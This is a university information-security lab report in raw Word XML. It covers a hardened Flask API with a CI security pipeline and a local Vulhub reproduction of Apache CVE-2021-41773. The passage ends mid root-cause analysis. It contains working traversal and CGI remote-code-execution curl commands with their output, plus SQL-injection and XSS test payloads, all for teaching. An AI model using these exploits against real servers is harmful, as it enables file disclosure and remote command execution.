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HANGZHOU DIANZI UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Information Security Laboratory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>LABORATORY WORK No. 1</w:t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Secure REST API Development with CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>and Real CVE Vulnerability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85"/>
        <w:gridCol w:w="4252"/>
      </w:tblGrid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Variant No.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Student (Surname, Name)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HDU number (student ID)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Group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Date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 / ____ / 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Repository: https://github.com/mahaotian23320311/work1-secure-api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions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1. Purpose of the work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goal of the work is to walk the full security lifecycle of a small backend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service: design it against the OWASP Top 10, automate the security checks in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CI/CD, then take a real, publicly documented vulnerability, reproduce it in an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isolated environment, explain its root cause, fix it and prove that the fix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works without breaking the application.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Two deliverables are produced: a working, hardened REST API with a green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pipeline, and a reproducible analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2021-41773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Apache HTTP Server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2.4.49 using the Vulhub environment.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2. Project and API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2.1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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc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Choice</w:t>
            </w:r>
          </w:p>
        </w:tc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Why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Language / framework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Python 3.11 + Flask 3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small, explicit, easy to show the security controls in code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Storage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 xml:space="preserve">SQLite via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> with parameterised statements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no ORM magic hides the SQL, so the anti-injection measure is visible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Authentication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PyJWT (HS256) + bcrypt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industry-standard token and password primitives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Tests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pytest (25 tests)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every security property is pinned by a test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CI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GitHub Actions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required by the assignment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CVE lab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Docker Compose + Vulhub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isolated, disposable vulnerable environment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  <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2.2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Path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Auth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Purpose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/auth/login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validate credentials, return a JWT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/api/data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 xml:space="preserve">list the post feed, optional </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>?search=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/api/notes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self-chosen endpoint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: create a note owned by the caller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/api/notes/&lt;id&gt;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read one note (owner or admin only)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/api/me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current user profile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/health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liveness probe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sz w:val="22"/>
        </w:rPr>
        <w:t>Example session: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-i http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>HTTP/1.1 401 UNAUTHORIZED</w:t>
        <w:br/>
        <w:t>WWW-Authenticate: Bearer realm="api"</w:t>
        <w:br/>
        <w:t>{"error":{"code":"missing_token","message":"A Bearer token is required."}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -X POST http://127.0.0.1:5001/auth/login -d '{"username":"alice","password":"Alice-Passw0rd!"}'</w:t>
        <w:br/>
        <w:t>{"access_token":"eyJhbGciOiJIUzI1NiIs...","token_type":"Bearer","expires_in":1800}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -H 'Authorization: Bearer &lt;token&gt;' http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>{"count":3,"items":[{"id":1,"title":"Welcome to the secure notes API","author":"alice", ...}]}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The full 9-step curl transcript is stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/curl-transcript.txt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terminal running scripts/live_demo.ps1 – steps 1, 3, 4 visible]]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3. Implemented security measures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3.1 Protection against SQL injection (A03)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All database access goes through parameterised statements. The query text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values are sent separately, so a value can never be parsed as SQL syntax.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user = db.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash, role FROM users WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    (username,),</w:t>
        <w:br/>
        <w:t>).fetchone()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Supporting details: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no f-strings,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 xml:space="preserve"> formatting or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> near SQL anywhere in the code base;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the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> term is bound *and* its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_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wildcards are escaped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LIKE ? ESCAPE '\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not dump the whole table;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table and column names are hard-coded, never taken from input.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Verification — the payloads below are stored as data, not executed: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-H "Authorization: Bearer $T" "http://127.0.0.1:5001/api/data?search=%27%20OR%201%3D1--"</w:t>
        <w:br/>
        <w:t>{"count":0,"items":[]}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tests/test_security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replays </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1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alice' --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' UNION SELECT id, username, password_hash … --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>'; DROP TABLE users; --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against both the login and the search endpoint: all are refused or return zero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rows, and the table still exists afterwards.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3.2 Protection against XSS (A03)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API answers with JSON, which is *not* automatically XSS-safe — clients put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JSON into the DOM. Therefore every string is HTML-escaped on the way out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escape_deep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app/security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), and the response carries hardening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headers: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Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'</w:t>
        <w:br/>
        <w:t>X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>X-Frame-Options: DENY</w:t>
        <w:br/>
        <w:t>Referrer-Policy: no-referrer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Verification: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 POST .../api/notes -d '{"title":"&lt;script&gt;alert(1)&lt;/script&gt;","body":"&lt;img src=x onerror=alert(2)&gt;"}'</w:t>
        <w:br/>
        <w:t>{"id":4,"title":"&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;","body":"&amp;lt;img src=x onerror=alert(2)&amp;gt;", ...}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The stored markup comes back inert: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img onerror&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reaches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client as markup.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3.3 Broken authentication (A07)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Password storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bcrypt with a per-password random salt and cost factor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12. Two users with the same password get different hashes; a stolen database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cannot be turned into passwords cheaply. SHA-256 would be useless here: it is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fast by design, so a GPU tests billions of candidates per second.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issuance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — HS256 JWT with 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username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nbf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 (30 min) and a random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. The signing secret comes from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environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>); if it is absent, a random one is generated at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start-up, so no default secret can ever ship.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verification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token_required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks the header shape, decodes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with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>algorithms=["HS256"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only (which rejects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algorithm-confusion forgeries), requires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>, and then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>re-reads the user from the database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so a deleted or downgraded account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cannot keep using an old token.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No user enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an unknown username still costs one bcrypt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comparison (against a dummy hash) and returns exactly the same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 xml:space="preserve"> body as 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wrong password.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Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tests/test_api.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains dedicated tests for a garbage token,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an expired token, an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token, and a token signed with a different key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— all four are rejected with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>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4. CI/CD pipeline with security scanners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.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs on every push and every pull request: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Job</w:t>
            </w:r>
          </w:p>
        </w:tc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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc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Gate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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>test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pytest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any failing test fails the run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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sast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 xml:space="preserve">bandit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>-ll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any medium/high finding fails the run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 w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sca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pip-audit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any known-vulnerable dependency fails the run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sz w:val="22"/>
        </w:rPr>
        <w:t>Reports are uploaded as build artifacts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bandit-report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pip-audit-report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pytest-report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), which is what the assignment asks to screenshot.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Local run of the same three commands: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pytest -q</w:t>
        <w:br/>
        <w:t>25 passed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ bandit -r app -x tests -ll</w:t>
        <w:br/>
        <w:t>No issues identified.</w:t>
        <w:br/>
        <w:t>Code scanned: 503 lines of code</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ pip-audit -r requirements.txt</w:t>
        <w:br/>
        <w:t>No known vulnerabilities found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GitHub Actions – all three jobs green]]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sast job log – "No issues identified"]]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sca job log – "No known vulnerabilities found"]]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5. Selected vulnerability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</w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4677"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr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CVE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CVE-2021-41773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Product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Apache HTTP Server 2.4.49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Class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CWE-22 – path traversal; CWE-20 – improper input validation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CVSS 3.1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7.5 HIGH (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N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Published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5 October 2021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Fixed in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2.4.51 (2.4.50 was an incomplete fix)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 xml:space="preserve">NVD, Apache HTTP Server security page, Vulhub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>httpd/CVE-2021-41773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sz w:val="22"/>
        </w:rPr>
        <w:t>Apache 2.4.49 introduced a rewritten request-path normaliser. A crafted URL can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therefore make the server map a request to a file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the document root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and return it. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Directory /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is permissive, arbitrary files are disclosed;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if CGI is enabled, the same traversal reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the request body is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executed as a shell script — remote code execution.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Vulhub environment for this CVE ships exactly that configuration: 2.4.49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with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mod_cgi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mod_cgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Directory /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relaxed to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Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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6. Reproduction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Environment: Docker Compose + Vulhub recipe (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/vulnerable/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).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vulnerability/vulnerable</w:t>
        <w:br/>
        <w:t>$ docker compose up --build -d</w:t>
        <w:br/>
        <w:t>$ curl -s http://127.0.0.1:8080/</w:t>
        <w:br/>
        <w:t>It works!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6.1 File disclosure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-v --path-as-is \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
        <w:br/>
        <w:t>&lt; HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
        <w:br/>
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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--path-as-is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential: otherwise curl normalises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e/…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on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client and the request never reaches the vulnerable code path.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6.2 Remote code execution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-v --data 'echo;id' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
        <w:br/>
        <w:t>&lt; HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>uid=1(daemon) gid=1(daemon) groups=1(daemon)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echo;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminates the CGI response headers so that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> output is visible in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body.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Both attacks were executed against the running container on this machine;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exact status lines, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Server: Apache/2.4.49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers and bodies are stored in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reports/cve-41773-phase1.log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terminal – curl traversal returning root:x:0:0]]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terminal – curl CGI returning uid=1(daemon)]]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7. Root cause analysis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Apache 2.4.49 removed the old </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_getparents()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_no2slash()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helpers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replaced them with a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_normalize_path()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by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ap_core_translate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The new function walks the URL segment by segment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refuses to let the path climb above the request root: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if (!seg_start || strcmp(seg_start, "..") == 0) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (path == path_start) return 0;   /* would leave the root */</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path--;                             /* drop the previous segment */</w:t>
        <w:br/>
        <w:t>}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The error is one of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ordering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: the comparison is made against the *still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percent-encoded* segment, while decoding happens later in the same pass.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Take the segment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>strcmp(".%2e", "..") != 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so the "cannot go above the root" branch is not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taken and the segment looks like an ordinary file name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The decoder then turns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
